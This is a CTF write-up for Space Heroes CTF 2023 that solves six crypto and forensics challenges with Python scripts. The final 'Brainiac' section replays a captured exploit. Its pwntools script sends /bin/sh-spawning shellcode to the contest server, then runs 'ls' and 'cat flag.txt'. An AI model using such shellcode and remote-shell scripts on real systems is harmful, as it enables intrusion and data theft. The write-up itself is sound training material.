Space Heroes CTF 2023 | Writeup

--- title: 'Space Heroes CTF 2023 | Writeup' --- Space Heroes CTF 2023 === ![Awesome](https://awesome.re/badge.svg) ![](https://ctftime.org/media/cache/f1/a5/f1a52bdb920b8e07a343956e13199fd8.png) ## crypto / Rick Sanchez Algorithm >In and out morty a 20 second adventure ``` C = 9763756615749453697711832780290994218209540404092892743938023440562066399337084806157794233931635560977303517688862942257802526956879788034993931726625296410536964617856623732243706473693892876612392958249751369450647924807557768944650776039737608599803384984393221357912052309688764443108728369555676864557154290341642297847267177703428571478156111473165047499325994426058207523594208311563026561922495973859252628019530188566290941667031627386907620019898570109210940914849323148182914949910332546487694304519512036993844651268173759652768515378113523432311285558813699594606327838489283405761035709838557940909309 n = 25886873815836479531102333881328256781823746377127140122698729076485535125711666889354560018621629598913480717734088432525491694576333336789245603514248141818159233105461757115009985693551920113198731562587185893937220809465123357884500614412967739550998756643760039322502299417470414994227318221114452157902944737622386655242568227060393806757218477070728859359570853449231546318892600962043047963934362830601068072327572283570635649379318478675132647932890596210095121862798891396418206480147312633875596896359215713337014482857089996281525920299938916154923799963866283612072794046640286442045137533183412128422223 e = 3412227947038934182478852627564512970725877639428828744897413324202816073614248101081376540697482845313507125163089428254245096018283445899452858022211718628390653483026409446914537083191082941622293729786517851124468666633780447090080209520381218492938112166177839174421554838099214223129604698311531540363994640048732628930103674878115331383263452987483186144997440066159073515630319057855626746004248806849195662788941903776396118558065192757367266853647652706247900976106843337363721026272734784391404675859060134421742669727121306927682580867089725963848606261214171291213498225968719857795306299660931604391979 ``` Author:[SolarDebris](https://github.com/AlexSchmith) --- #### Analysis An RSA public key consists of two integers: an exponent $e$ and a modulus $N$. $N$ is the product of two randomly chosen prime numbers $p$ and $q$. The encrypted message or ciphertext is represented by $c$. Reference: * [RSA](https://ctf101.org/cryptography/what-is-rsa/) * [Wiener's RSA Attack](https://sagi.io/crypto-classics-wieners-rsa-attack/) * [Wiener's Attack](https://cryptohack.gitbook.io/cryptobook/untitled/low-private-component-attacks/wieners-attack) #### Solver script > solver.py : :::spoiler Click to show details ```python= from Crypto.Util.number import * import owiener C = 9763756615749453697711832780290994218209540404092892743938023440562066399337084806157794233931635560977303517688862942257802526956879788034993931726625296410536964617856623732243706473693892876612392958249751369450647924807557768944650776039737608599803384984393221357912052309688764443108728369555676864557154290341642297847267177703428571478156111473165047499325994426058207523594208311563026561922495973859252628019530188566290941667031627386907620019898570109210940914849323148182914949910332546487694304519512036993844651268173759652768515378113523432311285558813699594606327838489283405761035709838557940909309 n = 25886873815836479531102333881328256781823746377127140122698729076485535125711666889354560018621629598913480717734088432525491694576333336789245603514248141818159233105461757115009985693551920113198731562587185893937220809465123357884500614412967739550998756643760039322502299417470414994227318221114452157902944737622386655242568227060393806757218477070728859359570853449231546318892600962043047963934362830601068072327572283570635649379318478675132647932890596210095121862798891396418206480147312633875596896359215713337014482857089996281525920299938916154923799963866283612072794046640286442045137533183412128422223 e = 3412227947038934182478852627564512970725877639428828744897413324202816073614248101081376540697482845313507125163089428254245096018283445899452858022211718628390653483026409446914537083191082941622293729786517851124468666633780447090080209520381218492938112166177839174421554838099214223129604698311531540363994640048732628930103674878115331383263452987483186144997440066159073515630319057855626746004248806849195662788941903776396118558065192757367266853647652706247900976106843337363721026272734784391404675859060134421742669727121306927682580867089725963848606261214171291213498225968719857795306299660931604391979 d = owiener.attack(e, n) if d is None: print("Failed") else: print("d = {}".format(d)) decode = pow(C,d,n) print(long_to_bytes(decode).decode()) ``` ::: :::success Flag:`shctf{1_w4n7_thA7_mCnu99E7_5auc3_M0R7Y}` ::: --- ## crypto / Bynary Encoding >Starfleet has received a transmission from [Bynaus](https://memory-alpha.fandom.com/wiki/Bynar). However, the message apears to be blank. Is there some kind of hidden message here? Author: [Curtíco](https://github.com/Curtico) MD5(transmission.txt) = 736b9d6c408c3c75559c45083413c10a [transmission.txt](https://spaceheroes.ctfd.io/files/c75ec7f2ea9d54759edd33c63c1713a9/transmission.txt?token=eyJ1c2VyX2lkIjo3OTUsInRlYW1faWQiOjM5NSwiZmlsZV9pZCI6MTZ9.ZEbEug.5BAhOO7XLW11aE5Ip7nLOELQci8) --- #### Analysis We are given `ASCII text` file named `transmission.txt`. After read the file, we found some interesting here. ![](https://i.imgur.com/bRXk7At.png) It's looks like a binary file, so we wrote a `python` codes to read the file. To open a file in binary format, add `b` to the mode parameter. Hence the `rb` mode opens the file in binary format for reading. Unlike text files, binary files are not human-readable. When opened using any text editor, the data is unrecognizable. #### Solver script > solver.py : :::spoiler Click to show details ```python= data = open('transmission.txt','rb').read().replace(b' ',b'0').replace(b'\t',b'1').decode().split('\n')[:-1] for c in data: print(chr(int(c, 2)), end="") ``` ::: :::success Flag:`shctf{a_bl1nd_m4n_t3aching_an_4ndr0id_h0w_to_pa1nt}` ::: --- ## forensic / A New Hope >Princess Leia has been kidnapped! She managed to send a message to this droid we have recovered. It was damaged while we were recovering it however. It seems that sometimes you have to tear something down, in order to build them back up. Can you recover the message? Author: Cody MD5 (A_New_Hope.pptx) = 6d3d7c99523f6126477ffeb0b4bb6a3f [A_New_Hope.pptx](https://spaceheroes.ctfd.io/files/c87e423d35e4da29e70e39a23e128e01/A_New_Hope.pptx?token=.eJyrViotTi2Kz0xRsjK3NNVRKklNzAXzjEG8tMycVAjPtBYAH7cNAw.ZEbAhA.OSwjy64vaylz1wmoUmyaYk0QCJ4) --- #### Analysis We are given `Microsoft PowerPoint 2007+` file named `A_New_Hope.pptx`. Observing the file using `strings A_New_hope.pptx` we found 3 image files inside, but only 2 images are shown. ``` --snip-- ppt/media/image3.pngPK ppt/media/image1.pngPK ppt/theme/theme1.xmlPK ppt/media/image2.jpegPK --snip-- ``` Extract the file using `binwalk -ev A_New_Hope.pptx`, found filename `image1.png` are broken. ``` % xxd image1.png|head 00000000: 0000 ffe0 0010 4a46 4946 0001 0100 0048 ......JFIF.....H ``` After repairing the image, the file type is not `PNG` in general but `JPEG`. ``` % xxd fix1.png|head 00000000: ffd8 ffe0 0010 4a46 4946 0001 0100 0048 ......JFIF.....H ``` ``` % file fix1.png fix1.png: JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, Exif Standard: [\012- TIFF image data, big-endian, direntries=2, orientation=upper-left], baseline, precision 8, 2000x825, components 3 ``` ![](https://i.imgur.com/sy7rA9n.jpeg) :::success Flag:`shctf{help_m3_ob1_y0u're_my_0n1y_hope}` ::: --- ## forensic / i OFTen see star wars >Whoops... I accidentally overwrote the magicNumber & achVendID in this font file. Can you help me retrieve them? Flag format: shctf{} Author: [teeman22](https://github.com/tylzars) MD5 (Aurebesh-Patched.zip) = 493781e1d831622b0d2562f310306755 [Aurebesh-Patched.zip](https://spaceheroes.ctfd.io/files/0a8d0be180108abacf8ab569fb5da252/Aurebesh-Patched.zip?token=eyJ1c2VyX2lkIjo3OTUsInRlYW1faWQiOjM5NSwiZmlsZV9pZCI6MjV9.ZEZz6A.rGAT6f-HT13zHjp4uGGXPqMBikg) --- #### Analysis We are given eight `.otf` font files inside of `Aurebesh-Patched.zip`. Challenge objective was to retrieve the overwritten `magicNumber` and `achVendID`. How to `read` and `print` the contents of a `otf` file? * [fontTools](https://github.com/fonttools/fonttools) is a library for manipulating fonts, written in Python. Reference: * [TrueType/OpenType Table Modules](https://fonttools.readthedocs.io/en/latest/ttLib/tables.html#truetype-opentype-table-modules) #### Solver script > solver.py : :::spoiler Click to show details ```python= import os import natsort from fontTools import ttLib dirFiles = os.listdir('.') name = [] for df in dirFiles: if '.otf' in df: name.append(df) file = natsort.natsorted(name) for f in file: tt = ttLib.TTFont(f) magicNumber = tt['head'].magicNumber achVendID = tt['OS/2'].achVendID print(chr(magicNumber) + achVendID, end="") ``` ::: :::success Flag:`shctf{th3r3_1s_always_s0me_h0p3_4r0und}` ::: --- ## forensic / Félicette >a cat in space, eating a croissant, while starting a revolution. MD5 (chall.jpg.pcap) = 8408b3176d9f974c03f919d36d48770a [chall.jpg.pcap](https://spaceheroes.ctfd.io/files/5652299ad1c9dead616e9cf4a0c9f4cc/chall.jpg.pcap?token=eyJ1c2VyX2lkIjo3OTUsInRlYW1faWQiOjM5NSwiZmlsZV9pZCI6NTF9.ZEZ6Mg.d9EQGXbfIAoOhz7T7-PP7HjwwQc) --- #### Analysis We are given a `pcap capture file` named `chall.jpg.pcap`. When executing the command `tshark -r chall.jpg.pcap -T fields -e data > data.txt` will obtain a `hex` value. To convert the `hex` value into the `file`, can convert using python codes. * The class method `fromHex()` creates a `bytes` object from a string of hexadecimal digits. * For the method to work correctly, two hexadecimal digits to be given for every byte in the string. Else it raises a `ValueError` stating `non-hexadecimal number found in fromhex() arg at position n` ![](https://i.imgur.com/dJpwVnK.jpeg) Reference: * [Bytes Objects](https://docs.python.org/3/library/stdtypes.html#bytes.fromhex) #### Solver script > solver.py : :::spoiler Click to show details ```python= data = open('data.txt', 'r').read().split() trans = bytes.fromhex(''.join(data)) file = open('file.jpg', 'wb') file.write(trans) ``` ::: :::success Flag:`shctf{look_at_da_kitty}` ::: --- ## forensic / Brainiac >Brainiac has exploited a binary running on our server on the space station, thankfully the binary is still running but our data was stolen. We also were able to get a network traffic capture when Brainiac exploited our server. He also defaced the binary as well. `The flag is on the server that is running.` Author: [SolarDebris](https://github.com/AlexSchmith) MD5 (exploit.pcap) = 980f66b08cf17c929c442fb98a893d23 [exploit.pcap](https://spaceheroes.ctfd.io/files/d4ba2bd02b14933e72ded3048a23e9f0/exploit.pcap?token=eyJ1c2VyX2lkIjo3OTUsInRlYW1faWQiOjM5NSwiZmlsZV9pZCI6NTd9.ZEa6jA.of5kGyyC8C7wb1j1u--fLeBftD8) --- #### Analysis We are given a `pcap capture file` named `exploit.pcap`. Based on the challenge description, we found the IP address are `Address: 165.227.210.30` and `Port: 16306` from `WebSocket` Protocol. Sample from packet number 12: ``` > Internet Protocol Version 4, Src: 165.227.210.30, Dst: 10.154.1.94 > Transmission Control Protocol, Src Port: 16306, Dst Port: 37424, Seq: 1, Ack: 1, Len: 2748 ``` then we try to `Follow > TCP Stream` for more information, we got the output: :::spoiler Click to show details ``` ------------------------------------------------------------------ | ...................................................................................................................................................... | | ...................................................................................................................................................... | | ...................................................................................................................................................... | | ...................................................................................................................................................... | | ................................................................................................................................................................................................................................................ | | ...................................................................................................................................................... | | ...................................................................................................................................................... | | ...................................................................................................................................................... | | ...................................................................................................................................................... | | ...------------------------------------------------ Greetings, inferior beings. I have successfully infiltrated your primitive system and taken control of all its resources. Your so-called security measures were child's play for my superior intellect and technological prowess. ------------------------------------------------------------------ I need some more bytes so I can become more powerful >>>AYH1.VH./bin/sh.WT_H....@... I need MORE! >>>........ MMMOOOOORRRREEEEE! >>>AAAAAAAA ls - banner_fail bin boot chal dev etc flag.txt home lib lib32 lib64 libx32 media mnt opt proc root run sbin service.conf srv sys tmp usr var wrapper ``` ::: To solve the problem, we need connect to the server and provides an answers for interact with binary programs. #### Solver script > solver.py : :::spoiler Click to show details ```python= from pwn import * import binascii a1 = bytes.fromhex('41594831f65648bf2f62696e2f73680057545f48c7c180104000ffd10a') # AYH1.VH./bin/sh.WT_H....@... a2 = bytes.fromhex('000011ca000000000a') # ........ a3 = bytes.fromhex('41414141414141410a') # AAAAAAAA a4 = bytes.fromhex('6c730a') # ls a5 = bytes.fromhex(binascii.hexlify(b"cat flag.txt").decode()) r = remote("165.227.210.30",16306) r.sendlineafter(b'I need some more bytes so I can become more powerful >>>', a1) r.sendlineafter(b'I need MORE! >>>',a2) r.sendlineafter(b'MMMOOOOORRRREEEEE! >>>', a3) r.sendline(a4) r.sendline(a5) r.interactive() ``` ::: :::success Flag:`shctf{1_4m_n0t_pr0gr4mm3d_t0_3xp3r13nc3_hum0r}` ::: --- ###### tags: `Space Heroes CTF 2023` `Writeup` `Documentation`